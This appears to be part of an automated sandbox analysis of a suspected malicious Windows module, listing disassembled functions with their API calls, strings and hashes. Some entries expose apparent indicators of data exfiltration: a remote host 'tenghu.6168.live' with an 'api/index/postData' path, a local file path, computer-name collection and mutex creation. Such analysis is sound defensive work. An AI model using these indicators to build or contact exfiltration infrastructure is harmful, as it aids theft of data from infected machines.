Instruction Fuzzy Hash: 4F319EB5C00158AFEB05DFA4C845BEEBBB4FF08350F50816EE485A7291DB706E89CB90

Function 10017284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 100172DD
_sprintf.LIBCMT ref: 1001730A
_strtok.LIBCMT ref: 1001731C

Strings

%c%s, xrefs: 10017304

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _strtok$_sprintf
String ID: %c%s
API String ID: 3026970268-3720742152
Opcode ID: 5700d7e9d398f7923e82cb589ae5201eedca8beab61949594473353bbd0a817d
Instruction ID: 38263fc47139841850a4c0d857f1facff7ba69157adaf70a273bbf55d31e901d
Opcode Fuzzy Hash: 5700d7e9d398f7923e82cb589ae5201eedca8beab61949594473353bbd0a817d
Instruction Fuzzy Hash: BB11AB3A6041125BC72ACD2D9C509BEB7E8FB85266B20C11AFD88CF142DA35D98793B0

Function 1000FDFA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 10011988: __EH_prolog.LIBCMT ref: 1001198D
Part of subcall function 10011988: __time64.LIBCMT ref: 100119AE

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273

Part of subcall function 10002F31: _memmove.LIBCMT ref: 10002F99

Part of subcall function 10001898: _sprintf.LIBCMT ref: 100018EE
Part of subcall function 10001898: _memmove.LIBCMT ref: 1000190C

CreateMutexA.KERNEL32(00000000,00000000,?), ref: 1000FE96

Part of subcall function 1000C15A: __vsnprintf_s.LIBCMT ref: 1000C194
Part of subcall function 1000C15A: _memmove.LIBCMT ref: 1000C1E9

Strings

ecf3@#$$1df6..`34, xrefs: 1000FE28, 1000FE2D, 1000FE39
!, xrefs: 1000FE5C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_memmove$ComputerCreateMutexName__time64__vsnprintf_s_sprintf
String ID: !$ecf3@#$$1df6..`34
API String ID: 2149523713-190452146
Opcode ID: 1feabde3a13f95170f0a44f99bc9fd1d7863c0c9fd0dfc79212f008eeccacc60
Instruction ID: c22f934d16eb9976fd3c374d665a4e04d28f85c3ea89487fa164600ae51b7a52
Opcode Fuzzy Hash: 1feabde3a13f95170f0a44f99bc9fd1d7863c0c9fd0dfc79212f008eeccacc60
Instruction Fuzzy Hash: D5312F75900218DFEB14CFA4CC86BED77B4EF15340F6040AAE506AB58ADB74AA48CF51

Function 1000CE76 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000CE7B

Part of subcall function 10001F26: _memmove.LIBCMT ref: 10001F7B

Strings

C:\Windows\mac.txt, xrefs: 1000CF37, 1000CF3C, 1000CF44
api/index/postData, xrefs: 1000CF4C, 1000CF51, 1000CF59
tenghu.6168.live, xrefs: 1000CF19, 1000CF1F

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_memmove
String ID: C:\Windows\mac.txt$api/index/postData$tenghu.6168.live
API String ID: 3529519853-4207139594
Opcode ID: 91e3656e8a24724188c2711ec235435a1cf4fc0b7a16e443a8df7bf3f593d5a4
Instruction ID: adca96bc2beb5f9700a5d6740181b81e08b6f6717ed4fdf97450e115fb6c8430
Opcode Fuzzy Hash: 91e3656e8a24724188c2711ec235435a1cf4fc0b7a16e443a8df7bf3f593d5a4
Instruction Fuzzy Hash: 1A21C1B59013599FD714CF18C844AEABBF8EF44300F0085ADE604AB342D7B4AA88CBA4

Function 10002F31 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 10002F99

Strings

req, xrefs: 10002F34
string too long, xrefs: 10002FCC
invalid string position, xrefs: 10002FC2

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$req$string too long
API String ID: 4104443479-1491086866
Opcode ID: 8946bc58172214ad4cfdbafcbe122684c09b910483ef1b17ccb8cead613a64dc
Instruction ID: cfd4b9c1781209dca49e7b3e466b15feceaa43bfd17bfcaa1db081935344ae10
Opcode Fuzzy Hash: 8946bc58172214ad4cfdbafcbe122684c09b910483ef1b17ccb8cead613a64dc
Instruction Fuzzy Hash: 78114F713007069BEB24DE6CD880A6AB7B9EB452D0B20093DF955CB285CB70ED44CBA4

Function 10025360 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(0.0.0.0,0000003A,?,?,?,?,100224BC,?,?), ref: 1002537F
_swscanf.LIBCMT ref: 100253B9

Strings

%d.%d.%d.%d%c, xrefs: 100253B3
0.0.0.0, xrefs: 1002537E, 100253B8

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _swscanf
String ID: %d.%d.%d.%d%c$0.0.0.0
API String ID: 2748852333-3443380886
Opcode ID: 11a4e99fa972d5e1a6fe653c7a82eca1ed9a2bbf27e2babda35382efd54e40f9
Instruction ID: 25fb6b1349beb459330e93536e0f20326eda5ba292d59683b0e3ad5ee5c2430a
Opcode Fuzzy Hash: 11a4e99fa972d5e1a6fe653c7a82eca1ed9a2bbf27e2babda35382efd54e40f9
Instruction Fuzzy Hash: 20118231E001189ADB15DAA89C91BFE73ACEB09241F50456AE807E7540DA61AA048391

Function 1004A642 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 1004A659
_wcscmp.LIBCMT ref: 1004A66A

Strings

ACP, xrefs: 1004A653
OCP, xrefs: 1004A664

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: 3788e05a5c00897567c11991bb2e28d59036afb96a1be0fb0cd55ae541e3d158
Instruction ID: f8bf117776a5426861ffb6740122a8423725848eaef955d6d2416d0bdc1a4bea
Opcode Fuzzy Hash: 3788e05a5c00897567c11991bb2e28d59036afb96a1be0fb0cd55ae541e3d158
Instruction Fuzzy Hash: 4D01B9755056157BE711DA58DC45FCA37DCDF032A5F294432FE08EA141E734EAC0869C

Function 10001898 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 100018EE
_memmove.LIBCMT ref: 1000190C

Strings

2892a8479d10ebb5bf5597689af04205, xrefs: 10001906, 1000190B
%02x, xrefs: 100018E8

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove_sprintf
String ID: %02x$2892a8479d10ebb5bf5597689af04205
API String ID: 4290250018-2255596808
Opcode ID: d31cec41dd092a9260eac5da9dabf45411b078c2ec4e56666665ca2581059d6f
Instruction ID: 7f7d9291e7d1561cba996a3be456474d42d53ddccf85c22bc39dd5b433d6c281
Opcode Fuzzy Hash: d31cec41dd092a9260eac5da9dabf45411b078c2ec4e56666665ca2581059d6f
Instruction Fuzzy Hash: 7B0124779043446BE700DA68DC45DEFB7ACDF86244F04467AFA9097042EA21E70987E2

Function 100256C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

Part of subcall function 10025360: StrChrA.SHLWAPI(0.0.0.0,0000003A,?,?,?,?,100224BC,?,?), ref: 1002537F

WSASetLastError.WS2_32(00002741,?,?,?,?,100224BC,?,?), ref: 100256E6
WSAStringToAddressA.WS2_32(0.0.0.0,?,00000000,?,?,?,?,?,?,100224BC,?,?), ref: 1002570E
htons.WS2_32(?), ref: 1002571E

Strings

0.0.0.0, xrefs: 1002570D

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: AddressErrorLastStringhtons
String ID: 0.0.0.0
API String ID: 1418563660-3771769585
Opcode ID: 80c0fe82c571b4466ae40e4aa2bb96a2c231a375e17fac767ce2bb17dd47fc6a
Instruction ID: 3f1fcc1f3a2087331d7d15dcf5dccc4673aa52c6449c80de615415efd1df2b85
Opcode Fuzzy Hash: 80c0fe82c571b4466ae40e4aa2bb96a2c231a375e17fac767ce2bb17dd47fc6a
Instruction Fuzzy Hash: 70F0CD3620011567E3149B55FC46BFA77ACEF84751FC08027FD0BC7250D6B69C4143A8

Function 10025D90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,100258DB,?,?,?,?,?,?,00000000), ref: 10025DA0
GetProcAddress.KERNEL32(00000000,CreateFileTransactedA), ref: 10025DB0

Strings

kernel32.dll, xrefs: 10025D9B
CreateFileTransactedA, xrefs: 10025DAA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: CreateFileTransactedA$kernel32.dll
API String ID: 1646373207-3827029016
Opcode ID: dea7207520db23331e918d51f5928aa84aa35f06126451d44e72f040fa8df87b
Instruction ID: 6e621c7507306dd0d00a2d7c3f0cf8e4072784d058b41c5a65c5220a5ac45b24
Opcode Fuzzy Hash: dea7207520db23331e918d51f5928aa84aa35f06126451d44e72f040fa8df87b
Instruction Fuzzy Hash: 5A016D31140319AAFB209F50EC09F863BA8EB00765F10811AF9556A1D0C7F69AA4CBE8

Function 1001791F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10017979

Strings

ios_base::eofbit set, xrefs: 1001796E
ios_base::failbit set, xrefs: 10017967
ios_base::badbit set, xrefs: 1001794A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 15c9c8b37894c2f68788243e4ca0510385f94a7a4ba97539158ebb1a963152d1
Instruction ID: abcd5fdf44a851d009f31012c7346560398e0892ee7d19a3241a88ec05ef4cf5
Opcode Fuzzy Hash: 15c9c8b37894c2f68788243e4ca0510385f94a7a4ba97539158ebb1a963152d1
Instruction Fuzzy Hash: D2F03A74804209BADB60DA90CD45FDD77B8FB04394F204056EA596E041D775F58ECB21

Function 1001A61C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 1001A640

Strings

inc\http\Socket.cpp, xrefs: 1001A62C
Error (%s) in line: %d in file: %s, xrefs: 1001A63B
value.length() > 0, xrefs: 1001A636

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _wprintf
String ID: Error (%s) in line: %d in file: %s$inc\http\Socket.cpp$value.length() > 0
API String ID: 2738768116-3865214099
Opcode ID: af253a9d0776008a0feedace79eea7e52168fb9f9dc25d0b06e68507312a9eac
Instruction ID: 3cf117a0ffd019b2a007e7704ba5bf3c3ed25bc2d38f70d11fdd4abc5557efdb
Opcode Fuzzy Hash: af253a9d0776008a0feedace79eea7e52168fb9f9dc25d0b06e68507312a9eac
Instruction Fuzzy Hash: 60E0263620021173E620E4048C01FEA7398EB12BB2F000227F7106A0C19BB0BA8982EA

Function 1001A65F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 1001A683

Strings

inc\http\Socket.cpp, xrefs: 1001A66F
Error (%s) in line: %d in file: %s, xrefs: 1001A67E
value.length() > 0, xrefs: 1001A679

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _wprintf
String ID: Error (%s) in line: %d in file: %s$inc\http\Socket.cpp$value.length() > 0
API String ID: 2738768116-3865214099
Opcode ID: c2dfad6af6c8c749b56c24bf6833c75b1204c47d6c3b1cc853e2952c292a9739
Instruction ID: e4337fc0f58c1900e36de4e47a3f2845e6f3211dd648dfe6763fce8059eeaeca
Opcode Fuzzy Hash: c2dfad6af6c8c749b56c24bf6833c75b1204c47d6c3b1cc853e2952c292a9739
Instruction Fuzzy Hash: B8E0263210021077E710F4048C01FEB73A8DB02BB1F144227F7102A0C297B0BA8982E9

Function 10017C93 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 10017CB7

Strings

Error (%s) in line: %d in file: %s, xrefs: 10017CB2
data.length() > 0, xrefs: 10017CAD
inc\http\HttpConnection.cpp, xrefs: 10017CA3

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _wprintf
String ID: Error (%s) in line: %d in file: %s$data.length() > 0$inc\http\HttpConnection.cpp
API String ID: 2738768116-3760416322
Opcode ID: 4255c16bde2e3edf86c81f29ce580747cf4caa3fc488035be78a800a0fafe731
Instruction ID: f89cb4ef67b9403efdd39d3a924859df5da6e48757c41decb9cd1966042a8b7d
Opcode Fuzzy Hash: 4255c16bde2e3edf86c81f29ce580747cf4caa3fc488035be78a800a0fafe731
Instruction Fuzzy Hash: 58E0CD3311021177E210F554DC01FD67358FB516B1F040237BB146B1C6D7F27A5982E5

Function 10034D70 Relevance: 6.2, APIs: 4, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 51802beb59c1eba136ef365886ddaad28624ca3ca5aef29b921a4c3245a07fe3
Instruction ID: 9a01dc5978f94277987ef6d4315d4500b0bc7dc9949d64def392f00dce809a35
Opcode Fuzzy Hash: 51802beb59c1eba136ef365886ddaad28624ca3ca5aef29b921a4c3245a07fe3
Instruction Fuzzy Hash: 47819F79A0025A9FCF12DF58DD8059E7BA6FF85346F164569EC08AF301DB31BD108BA1

Function 10038B62 Relevance: 6.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 10038BE6
_memmove.LIBCMT ref: 10038C2D
___AdjustPointer.LIBCMT ref: 10038C7B
_memmove.LIBCMT ref: 10038C84

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: AdjustPointer_memmove
String ID:
API String ID: 1721217611-0
Opcode ID: f7bb1e2027c8e16282f0e3a6feacda1fe47804c2d424949662134a3496708540
Instruction ID: 93f4f4492b9848a447a4813ebf6b47e3c6843374611b1ddcbe40567b5ef99b88
Opcode Fuzzy Hash: f7bb1e2027c8e16282f0e3a6feacda1fe47804c2d424949662134a3496708540
Instruction Fuzzy Hash: C441B3356157029EEB2ACE25E891B5A73F4EF41262F21006DF8049E792DF32FA81D720

Function 1001F140 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(93656AD3,93656AD3,00000000,?,00000000,100505E8,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F1C2
InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00001000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F27C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F2B4
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,000000FF,?,1000D70F,?,10065258,00000000,0000000F), ref: 1001F2C4

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

